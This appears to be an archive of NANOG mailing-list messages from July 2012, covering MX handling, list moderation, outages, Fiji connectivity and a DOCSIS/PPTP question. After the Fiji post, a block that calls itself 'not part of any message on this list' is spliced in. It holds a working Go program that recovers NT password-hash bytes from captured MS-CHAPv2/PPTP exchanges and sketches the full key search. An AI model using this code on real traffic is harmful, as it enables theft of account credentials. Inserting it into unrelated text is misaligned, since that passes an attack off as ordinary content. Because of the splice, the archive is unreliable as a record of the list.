Locating the Target Host Once an SMTP client lexically identifies a domain to which mail will be delivered for processing (as described in Sections 2.3.5 and 3.6), a DNS lookup MUST be performed to resolve the domain name (RFC 1035 [2]). The names are expected to be fully-qualified domain names (FQDNs): mechanisms for inferring FQDNs from partial names or local aliases are outside of this specification. The Internet uses DNS. You use some other scheme at your own peril, and probably shouldn't expect said other scheme to work outside the range of your administrative control. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From jra at baylink.com Mon Jul 30 15:35:40 2012 From: jra at baylink.com (Jay Ashworth) Date: Mon, 30 Jul 2012 16:35:40 -0400 (EDT) Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: Message-ID: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Randy Bush" > thanks MLC or whatever it calls itself this week C'mon, Randy; It's been called that since it kicked me off 7 years ago. :-) Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA +1 727 647 1274 From patrick at ianai.net Mon Jul 30 15:38:07 2012 From: patrick at ianai.net (Patrick W. 
Gilmore) Date: Mon, 30 Jul 2012 16:38:07 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> References: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> Message-ID: <36657963-2A5B-4B0B-B105-CA0AD24702D6@ianai.net> On Jul 30, 2012, at 16:35 , Jay Ashworth wrote: >> thanks MLC or whatever it calls itself this week > > C'mon, Randy; It's been called that since it kicked me off 7 years ago. :-) Except, of course, it has been called the Communications Committee for a while now. (The change was made because the committee took responsibility for more than just the mailing list.) But 1 change in 7 years made years ago does not, IMHO, merit a "whatever it calls itself this week" snark. -- TTFN, patrick From brian.peter.dickson at gmail.com Mon Jul 30 17:28:27 2012 From: brian.peter.dickson at gmail.com (Brian Dickson) Date: Mon, 30 Jul 2012 18:28:27 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: > > As a quick update, we've implemented some list settings last week to help > to > > keep spam off the list. New subscribers are moderated until we're > comfortable > with their posts. We rejected the idea of keyword based message filtering > since not only is a lot of work to maintain, it's trivial to get around it > if > you really want to post banned words. > Comments and suggestions are welcome. > Matt Griswold, on behalf of the NANOG Communications Committee > > I've always liked the idea found in xkcd.com/810 ;-). 
Brian From MGauvin at dryden.ca Mon Jul 30 18:08:32 2012 From: MGauvin at dryden.ca (Mark Gauvin) Date: Mon, 30 Jul 2012 18:08:32 -0500 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: References: Message-ID: <03ED7B75-D1C2-40D3-94DD-0DFFF7ECC52F@dryden.ca> On list spam has been minimal but off list cold call type emails have been mounting for several months Sent from my iPhone On 2012-07-30, at 5:29 PM, "Brian Dickson" wrote: >> >> As a quick update, we've implemented some list settings last week >> to help >> to >> >> keep spam off the list. New subscribers are moderated until we're >> comfortable >> with their posts. We rejected the idea of keyword based message >> filtering >> since not only is a lot of work to maintain, it's trivial to get >> around it >> if >> you really want to post banned words. >> Comments and suggestions are welcome. >> Matt Griswold, on behalf of the NANOG Communications Committee >> >> I've always liked the idea found in xkcd.com/810 ;-). > > Brian From allenmckinleykitchen at gmail.com Mon Jul 30 21:23:26 2012 From: allenmckinleykitchen at gmail.com (Allen McKinley Kitchen (gmail)) Date: Mon, 30 Jul 2012 22:23:26 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <5016DAB5.6060905@bogus.com> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> <5016DAB5.6060905@bogus.com> Message-ID: <5088408F-6BB1-4C5C-9D29-50060ADF3C0C@gmail.com> On Jul 30, 2012, at 15:04, joel jaeggli wrote: > On 7/30/12 10:57 AM, Steven Noble wrote: >> The fix for this issue is trivial. Every new signup ... > Most of the subscribers to the mailing list never post. 
> >> +1 (from an inveterate but VERY appreciative lurker) ..Allen From mysidia at gmail.com Mon Jul 30 21:27:17 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 30 Jul 2012 21:27:17 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <30240.1343679970@turing-police.cc.vt.edu> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> <30240.1343679970@turing-police.cc.vt.edu> Message-ID: On 7/30/12, valdis.kletnieks at vt.edu wrote: > On Mon, 30 Jul 2012 10:07:37 -1000, William Herrin said: > The Internet uses DNS. You use some other scheme at your own peril, Aside from that, RFC 974 [Page 3] gives mailers significant leeway in deciding how to handle errors: " Mailers are expected to do something reasonable in the face of an error. The behaviour for each type of error is not specified here, but implementors should note that different types of errors should probably be treated differently. " Attempting to find another path for an apparently unroutable message (all MX offline) is not entirely out of the question. You may not assume that such measures will not be attempted, if anyone could consider it a 'reasonable' error handling procedure. I will echo that; go back to the robustness principle of being liberal in what you accept.... You should either not listen on port 25, or you should not create that A record pointing to a mail server that won't actually accept mail. When "yourdomain.example.com" has an A record, all the services listening on that address are services for the domain. "Relay not allowed" to the same domain may be considered nonsensical, and a mailer converting its error recovery attempt into a permanent error at that point, may be reasoned. 
-- -JH From dylan at corp.power1.com Tue Jul 31 08:18:14 2012 From: dylan at corp.power1.com (Dylan Bouterse) Date: Tue, 31 Jul 2012 13:18:14 +0000 Subject: Qwest outage (Tampa) Message-ID: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> Is anybody familiar with the current Qwest outage in the Tampa area? Dylan From morrowc.lists at gmail.com Tue Jul 31 11:06:32 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 31 Jul 2012 12:06:32 -0400 Subject: Qwest outage (Tampa) In-Reply-To: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> References: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> Message-ID: redirect to outages@ On Tue, Jul 31, 2012 at 9:18 AM, Dylan Bouterse wrote: > Is anybody familiar with the current Qwest outage in the Tampa area? > > Dylan > > From jra at baylink.com Tue Jul 31 11:46:10 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 31 Jul 2012 12:46:10 -0400 (EDT) Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <36657963-2A5B-4B0B-B105-CA0AD24702D6@ianai.net> Message-ID: <32200673.17164.1343753170493.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Patrick W. Gilmore" > Except, of course, it has been called the Communications Committee for > a while now. (The change was made because the committee took > responsibility for more than just the mailing list.) My turn for "silly me". > But 1 change in 7 years made years ago does not, IMHO, merit a > "whatever it calls itself this week" snark. No... not, it doesn't. Maybe it's been less time in Japan? Cheers, -- jra -- Jay R. 
Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA #natog +1 727 647 1274 From bkain1 at ford.com Tue Jul 31 11:47:18 2012 From: bkain1 at ford.com (Kain, Rebecca (.)) Date: Tue, 31 Jul 2012 16:47:18 +0000 Subject: mail.yahoo.com Message-ID: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> It just stopped loading for me, and when it did come up I got a new "terms of agreement" pop-up which circles in an endless loop no matter what you click. Anyone else seeing this today at yahoo.com? From blakangel at gmail.com Tue Jul 31 11:50:14 2012 From: blakangel at gmail.com (Keith Simonsen) Date: Tue, 31 Jul 2012 09:50:14 -0700 Subject: mail.yahoo.com In-Reply-To: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> References: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> Message-ID: <50180CC6.9030202@gmail.com> Kain, Rebecca (.) wrote: > It just stopped loading for me, and when it did come up I got a new "terms of agreement" pop-up which circles in an endless loop no matter what you click. Anyone else seeing this today at yahoo.com? > Yeah, I'm getting username/password incorrect errors on my android phone as well as seeing the looping terms of agreement and some type of Server Load Error after hitting agree on the web site. I also tried reading the new ToS and Privacy Policy and was unable to connect to those servers with both Chrome and FF. -Keith From iptech at northrock.bm Mon Jul 30 07:33:51 2012 From: iptech at northrock.bm (iptech) Date: Mon, 30 Jul 2012 09:33:51 -0300 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <501678C9.4060604@northrock.bm> References: <501678C9.4060604@northrock.bm> Message-ID: <50167F2F.1020901@northrock.bm> Hi, We are a small ISP and have a setup in place with the local cable company for terminating their users via L2TP for Internet access. 
However they have just announced to us that they are moving to a DOCSIS 3.0 compliant setup, and this standard no longer supports PPPoE via L2TP, and can now only offer PPTP for terminating with us. We have already begun replacing our Cisco 7206VXR LNS devices with Cisco ASR 1Ks and as you will be aware the older 7206 can do both L2TP and PPTP, whereas the ASR1k can do only L2TP. I do not have any experience in the cable arena, but from what I have read in the DOCSIS standards, each version has maintained backwards compatibility, therefore I am very surprised our CableCo has claimed they cannot do PPPoE/L2TP anymore. The CMTS they are currently using is a Cisco, and now they are moving to a new ARRIS CMTS. I have not been able to find any information on this device and what it can do or not. With the ASR1K marked as the natural upgrade path for LNS functions, I cannot believe that it is not fully compatible with DOCSIS 3.0. From what I can tell the only way to accommodate the new CMTS PPTP connections will be to terminate them on the legacy 7206VXR, which at the end of the day is a backwards step. I would greatly appreciate if anyone can give me any pointers and/or suggestions on this matter, so I can understand it and move it forward. FYI: The driver for the CMTS upgrades is to offer higher bandwidth access speeds 15mb-20mb. Thank you. From source_route at yahoo.com Tue Jul 31 15:14:41 2012 From: source_route at yahoo.com (Philip Lavine) Date: Tue, 31 Jul 2012 13:14:41 -0700 (PDT) Subject: Fiji Islands Message-ID: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Who offers Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? 
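The DOCSIS 3.0 & PPPoE/L2TP thread above turns on the cable company offering only PPTP as the wholesale hand-off. PPTP authenticates with MS-CHAPv2, and the following Go program, an added example that is not part of any message on this list, shows in working code why that matters: the 24-byte NT-Response is three independent single-DES encryptions of the same 8-byte challenge hash, and the third DES key is built from only two bytes of the NT password hash padded with zeros, so anyone who captures the exchange can recover those two hash bytes with 65,536 DES operations and is then left with a plain 2^56 single-DES search for the rest. The MS-CHAPv2 steps follow RFC 2759; the 16-byte NT hash (MD4 of the UTF-16LE password) is taken as a constructed input rather than computed, the challenges and the username "alice" are constructed sample values, and the function names (challengeHash, challengeResponse, recoverHashTail) are this example's own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
)

// challengeHash is ChallengeHash() from RFC 2759: the first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName). Every input
// crosses the wire in the clear, so an eavesdropper can compute it too.
func challengeHash(peerChallenge, authChallenge [16]byte, username string) [8]byte {
	h := sha1.New()
	h.Write(peerChallenge[:])
	h.Write(authChallenge[:])
	h.Write([]byte(username))
	var out [8]byte
	copy(out[:], h.Sum(nil)[:8])
	return out
}

// expandDESKey spreads 7 key bytes over 8 bytes, leaving the low bit of
// each byte for parity, as DesEncrypt() in RFC 2759 does. DES discards the
// parity bits, so the effective key is still 56 bits.
func expandDESKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0] & 0xfe
	for i := 1; i < 7; i++ {
		k8[i] = (k7[i-1]<<uint(8-i) | k7[i]>>uint(i)) & 0xfe
	}
	k8[7] = (k7[6] << 1) & 0xfe
	return k8
}

// desEncrypt encrypts one 8-byte block under a 7-byte key.
func desEncrypt(k7 []byte, block [8]byte) [8]byte {
	c, err := des.NewCipher(expandDESKey(k7))
	if err != nil {
		panic(err) // only possible if the expanded key is not 8 bytes
	}
	var out [8]byte
	c.Encrypt(out[:], block[:])
	return out
}

// challengeResponse computes the 24-byte MS-CHAPv2 NT-Response: the same
// 8-byte challenge hash encrypted under three 7-byte DES keys carved out of
// the 16-byte NT hash. The third key holds only hash bytes 14 and 15 plus
// five zero bytes, so it has just 16 bits of unknown material.
func challengeResponse(ntHash [16]byte, ch [8]byte) [24]byte {
	key3 := make([]byte, 7)
	copy(key3, ntHash[14:16])
	keys := [][]byte{ntHash[0:7], ntHash[7:14], key3}
	var resp [24]byte
	for i, k := range keys {
		r := desEncrypt(k, ch)
		copy(resp[i*8:], r[:])
	}
	return resp
}

// recoverHashTail is the attacker's side: given the challenge hash and the
// captured 24-byte response, it tries all 2^16 third keys and returns
// ntHash[14:16]. The remaining 14 bytes are two independent single-DES keys
// encrypting the same known plaintext, so one pass over the 2^56 key space,
// checking each candidate against both response blocks, finishes the job.
func recoverHashTail(ch [8]byte, resp [24]byte) ([2]byte, bool) {
	key := make([]byte, 7)
	for cand := 0; cand < 1<<16; cand++ {
		binary.BigEndian.PutUint16(key[:2], uint16(cand))
		r := desEncrypt(key, ch)
		if bytes.Equal(r[:], resp[16:24]) {
			return [2]byte{key[0], key[1]}, true
		}
	}
	return [2]byte{}, false
}

func main() {
	// Constructed sample values for the demonstration; not from a real capture.
	var peer, auth [16]byte
	for i := range peer {
		peer[i] = byte(i)
		auth[i] = byte(0xf0 - i)
	}
	var ntHash [16]byte
	copy(ntHash[:], "\x8c\x46\x98\x6c\x5d\xd1\x52\x8f\x7e\x0a\x3b\x19\x44\x55\x66\x77")

	ch := challengeHash(peer, auth, "alice")
	resp := challengeResponse(ntHash, ch)
	tail, ok := recoverHashTail(ch, resp)
	fmt.Printf("NT-Response:            %x\n", resp)
	fmt.Printf("recovered ntHash[14:16]: %x (found=%v)\n", tail, ok)
}
```

Run with `go run`; the brute force over the third key takes well under a second. The NT hash itself is a password-equivalent (it is what NTLM authenticates with), so recovering it from a PPTP capture is not just a break of the tunnel's confidentiality but of the account. If the hand-off has to be PPTP, treat it as an unauthenticated, unencrypted transport and put a real tunnel (IPsec, or PPP over L2TP carried inside IPsec) on top of it.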
From jfbeam at gmail.com Tue Jul 31 15:19:31 2012 From: jfbeam at gmail.com (Ricky Beam) Date: Tue, 31 Jul 2012 16:19:31 -0400 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50167F2F.1020901@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: > 3.0 compliant setup, and this standard no longer supports PPPoE via > L2TP, and can now only offer PPTP for terminating with us. As I recall from my reading of "the standard", there's nothing in there to prevent any tunneling on top of the DOCSIS bridged ethernet. I suspect this is not a "standard" problem but an ISP problem... their new hardware doesn't support PPPoE/L2TP, it's an additional license, or they don't know how (or unwilling) to configure it. (I'm assuming the PPPoE is between you and the customer, and L2TP is between your network and the cable network. i.e. L2TP is how your customers are brought to you from the cable network.) I have no documentation on ARRIS either, so I don't know what they can/cannot do. From valdis.kletnieks at vt.edu Tue Jul 31 15:27:54 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 31 Jul 2012 16:27:54 -0400 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: Your message of "Mon, 30 Jul 2012 09:33:51 -0300." <50167F2F.1020901@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: <46981.1343766474@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 09:33:51 -0300, iptech said: > 3.0 compliant setup, and this standard no longer supports PPPoE via > L2TP, and can now only offer PPTP for terminating with us. "Hi ISP, meet Moxie Marlinspike. Moxie, meet ISP. I think you two have something to discuss..." -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From swm at emanon.com Tue Jul 31 15:39:47 2012 From: swm at emanon.com (Scott Morris) Date: Tue, 31 Jul 2012 16:39:47 -0400 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: <50184293.9040607@emanon.com> Hell... who needs help doing any sort of work over there??? I'd love to find a way to bind work and vacation spots together! :) Scott Twitter: @ScottMorrisCCIE E-mail: swm at emanon.com Knowledge is power. Power corrupts. Study hard and be Eeeeviiiil...... On 7/31/12 4:14 PM, Philip Lavine wrote: > Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? > > From khelms at ispalliance.net Tue Jul 31 15:46:52 2012 From: khelms at ispalliance.net (Scott Helms) Date: Tue, 31 Jul 2012 16:46:52 -0400 Subject: Fwd: Re: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <501843BC.5060700@zcorum.com> References: <501843BC.5060700@zcorum.com> Message-ID: <5018443C.6010404@ispalliance.net> I've actually run into this specific problem and the issue you're running into is that at no time was PPPoE part of the DOCSIS specification. It was supported on several CMTSs because the Cisco UBR shares much of its OS with more mainline Cisco routers which support L2TP and a host of other non-DOCSIS related protocols. It was also widely supported on some of the earliest CMTSs which were bridges instead of routers (then you needed a separate box to be the LNS). The real problem isn't a change in DOCSIS version but that they chose a platform that doesn't share a code base with a general purpose router. 
This could have been happenstance or by design, but I can tell you your chances of getting PPPoE to work at all on that platform (even for the cable operator) are not high because the box will not operate as a bridge and there is no (AFAIK) way to relay the PPP discover packets. The D3 Arris is either a C4 or a C4C: http://www.arrisi.com/products/product.asp?id=3 On 7/30/2012 8:33 AM, iptech wrote: > Hi, > > We are a small ISP and have a setup in place with the local cable > company for terminating their users via L2TP for Internet access. > However they have just announced to us that they are moving to a > DOCSIS 3.0 compliant setup, and this standard no longer supports PPPoE > via L2TP, and can now only offer PPTP for terminating with us. > > We have already begun replacing our Cisco 7206VXR LNS devices with > Cisco ASR 1Ks and as you will be aware the older 7206 can do both L2TP > and PPTP, whereas the ASR1k can do only L2TP. I do not have any > experience in the cable arena, but from what I have read in the DOCSIS > standards, each version has maintained backwards compatibility, > therefore I am very surprised our CableCo has claimed they cannot do > PPPoE/L2TP anymore. > > The CMTS they are currently using is a Cisco, and now they are moving > to a new ARRIS CMTS. I have not been able to find any information on > this device and what it can do or not. With the ASR1K marked as the > natural upgrade path for LNS functions, therefore I cannot believe > that it is not fully compatible with DOCSIS 3.0. > > From what I can tell the only way to accommodate the new CMTS PPTP > connections will be to terminate them on the legacy 7206VXR, which at > the end of the day is a backwards step. I would greatly appreciate if > anyone can give me any pointers and/or suggestions on this matter, so > I can understand it and move it forward. > > FYI: The driver for the CMTS upgrades is to offer higher bandwidth > access speeds 15mb-20mb. > > Thank you. 
> > > > > -- Scott Helms Vice President of Technology ZCorum (678) 507-5000 -------------------------------- http://twitter.com/kscotthelms -------------------------------- From zaid at zaidali.com Tue Jul 31 15:56:10 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 13:56:10 -0700 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: Connect is your best bet http://www.connect.com.fj/ Unwired is also a local competitor but I am not sure if they have coverage in Yaqara. Lautoka is a business district so you can get connectivity there from Connect and Unwired but Yaqara you might be quite limited since its a rural area. Send me a message if you need introduction to folks, I am still connected to some local telco and network engineers there. Zaid On Jul 31, 2012, at 1:14 PM, Philip Lavine wrote: > Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? From network.ipdog at gmail.com Tue Jul 31 16:04:24 2012 From: network.ipdog at gmail.com (Network IPdog) Date: Tue, 31 Jul 2012 14:04:24 -0700 Subject: You thought you had... wiring issues!!! Message-ID: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Mates. WiringIssues.jpg Ephesians 4:32 & Cheers!!! A password is like a... toothbrush ;^) Choose a good one, change it regularly and don't share it. -------------- next part -------------- A non-text attachment was scrubbed... Name: image001.jpg Type: image/jpeg Size: 46417 bytes Desc: not available URL: From lyle at lcrcomputer.net Tue Jul 31 16:07:23 2012 From: lyle at lcrcomputer.net (Lyle Giese) Date: Tue, 31 Jul 2012 16:07:23 -0500 Subject: You thought you had... wiring issues!!! 
In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: <5018490B.8000702@lcrcomputer.net> On 07/31/12 16:04, Network IPdog wrote: > Mates. > > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > > good one! One question, what are those big cables with the big boot on them? From sadiq at asininetech.com Tue Jul 31 16:13:07 2012 From: sadiq at asininetech.com (Sadiq Saif) Date: Tue, 31 Jul 2012 17:13:07 -0400 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: For the opposite check - http://www.reddit.com/r/cableporn (completely SFW of course ;)) On Tue, Jul 31, 2012 at 5:04 PM, Network IPdog wrote: > Mates. > > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > -- Sadiq S O< ascii ribbon campaign - stop html mail - www.asciiribbon.org From network.ipdog at gmail.com Tue Jul 31 16:24:13 2012 From: network.ipdog at gmail.com (Network IPdog) Date: Tue, 31 Jul 2012 14:24:13 -0700 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018490B.8000702@lcrcomputer.net> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> <5018490B.8000702@lcrcomputer.net> Message-ID: <50184d01.c7de440a.3e5a.622f@mx.google.com> They are HD Video Cables with baluns for hum suppression. Ephesians 4:32 & Cheers!!! A password is like a... toothbrush ;^) Choose a good one, change it regularly and don't share it. -----Original Message----- From: Lyle Giese [mailto:lyle at lcrcomputer.net] Sent: Tuesday, July 31, 2012 2:07 PM To: nanog at nanog.org Subject: Re: You thought you had... wiring issues!!! On 07/31/12 16:04, Network IPdog wrote: > Mates. 
> > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > > good one! One question, what are those big cables with the big boot on them? From jra at baylink.com Tue Jul 31 16:26:53 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 31 Jul 2012 17:26:53 -0400 (EDT) Subject: You thought you had... wiring issues!!! In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: <23464683.17258.1343770013281.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Network IPdog" [ sloppy-cable-porn pic attached ] No! Noooooooo! It's only Tuesday; you can't start the Whacky Weekend thread this early! Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA #natog +1 727 647 1274 From nat at nuqe.net Tue Jul 31 16:56:34 2012 From: nat at nuqe.net (Nat Morris) Date: Tue, 31 Jul 2012 22:56:34 +0100 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018490B.8000702@lcrcomputer.net> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> <5018490B.8000702@lcrcomputer.net> Message-ID: On 31 July 2012 22:07, Lyle Giese wrote: > good one! One question, what are those big cables with the big boot on > them? 
It's the back of an outside broadcast truck, the cables are triax - http://en.wikipedia.org/wiki/Triaxial_cable Boots are just used to protect the triax connector from damp when either hooked up to the back of a camera or an outside patch bay - http://www.steadicam-facilities.co.uk/images/equipment-triaxcameracable-163.jpeg -- Nat http://natmorris.co.uk http://twitter.com/natmorris From iptech at northrock.bm Tue Jul 31 17:13:41 2012 From: iptech at northrock.bm (iptech) Date: Tue, 31 Jul 2012 19:13:41 -0300 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: <50185895.4040203@northrock.bm> Hey Ricky, Yes that is the exact setup, the cableco bring the customer to us via L2TP, and now want to do PPTP only. I will keep digging on the ARRIS, which I have been told is a C4 system. Although their website doesn't show many tech specs. They are pushing for the L3 option since their CMTS will now be a hop in the path between the customer and us, instead of L2 transparent. Suggestions? Thanks, On 7/31/2012 5:19 PM, Ricky Beam wrote: > On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: >> 3.0 compliant setup, and this standard no longer supports PPPoE via >> L2TP, and can now only offer PPTP for terminating with us. > > As I recall from my reading of "the standard", there's nothing in > there to prevent any tunneling on top of the DOCSIS bridged ethernet. > > I suspect this is not a "standard" problem but an ISP problem... their > new hardware doesn't support PPPoE/L2TP, it's an additional license, > or they don't know how (or unwilling) to configure it. > > (I'm assuming the PPPoE is between you and the customer, and L2TP is > between your network and the cable network. i.e. L2TP is how your > customers are brought to you from the cable network.) > > I have no documentation on ARRIS either, so I don't know what they > can/cannot do. 
> From kyle.creyts at gmail.com Tue Jul 31 18:43:51 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Tue, 31 Jul 2012 16:43:51 -0700 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50185895.4040203@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> <50185895.4040203@northrock.bm> Message-ID: to elaborate on Valdis' reply, stick a fork in pptp, it is done. https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ On Tue, Jul 31, 2012 at 3:13 PM, iptech wrote: > Hey Ricky, > > Yes that is the exact setup, the cableco bring the customer to us via L2TP, > and now want to do PPTP only. > > I will keep digging on the ARRIS, which I have been told is a C4 system. > Although their website doesnt show much tech specs. > > They are pushing for the L3 option since their CMTS will now be a hop in the > path between the customer and us, instead of L2 transparent. > > Suggestions? > > Thanks, > > > On 7/31/2012 5:19 PM, Ricky Beam wrote: >> >> On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: >>> >>> 3.0 compliant setup, and this standard no longer supports PPPoE via L2TP, >>> and can now only offer PPTP for terminating with us. >> >> >> As I recall from my reading of "the standard", there's nothing in there to >> prevent any tunneling on top of the DOCSIS bridged ethernet. >> >> I suspect this is not a "standard" problem but an ISP problem... their new >> hardware doesn't support PPPoE/L2TP, it's an additional license, or they >> don't know how (or unwilling) to configure it. >> >> (I'm assuming the PPPoE is between you and the customer, and L2TP is >> between your network and the cable network. i.e. L2TP is how your customers >> are brought to you from the cable network.) >> >> I have no documentation on ARRIS either, so I don't know what they >> can/cannot do. 
>> > > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer From fmartin at linkedin.com Tue Jul 31 18:55:28 2012 From: fmartin at linkedin.com (Franck Martin) Date: Tue, 31 Jul 2012 23:55:28 +0000 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: In no particular order Connect.com.fj aka tfl.com.fj Fintel.com.fj Vodafone.com.fj (via a 3G stick) Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) If you want to do BGP or IPv6, good luck! Is that for Fiji Water? ;) These people have very good operational Internet experience in Fiji. http://www.linkedin.com/in/timothyverma http://www.linkedin.com/pub/alfred-prasad/0/409/14a http://au.linkedin.com/in/skeeve On 7/31/12 1:14 PM, "Philip Lavine" wrote: >Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? From michael at bowe.id.au Tue Jul 31 19:03:44 2012 From: michael at bowe.id.au (Michael Bowe) Date: Wed, 1 Aug 2012 10:03:44 +1000 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50185895.4040203@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> <50185895.4040203@northrock.bm> Message-ID: <002c01cd6f79$1eb00330$5c100990$@id.au> Hi iptech As others have said, early Cisco CMTS could do full bridging and/or PPPoE termination, but newer gear is typically L3 style only. For wholesale, the cableco could do one of these : * L2 solution : Change your customers to be configured as DOCSIS BSoD L2VPN, and deliver you one dot1q VLAN per customer. You can continue to use PPPoE with this config (sessions landing directly on your LNS). Gotcha: don't know about Arris, but Cisco caps you at 4K VLANs per chassis which means this solution doesn't scale all that well. * L2 solution : Change your customers to be set up as DOCSIS BSoD L2VPN, and deliver you one MPLS pseudowire per customer. You can continue to use PPPoE with this config (sessions landing directly on your LNS). 
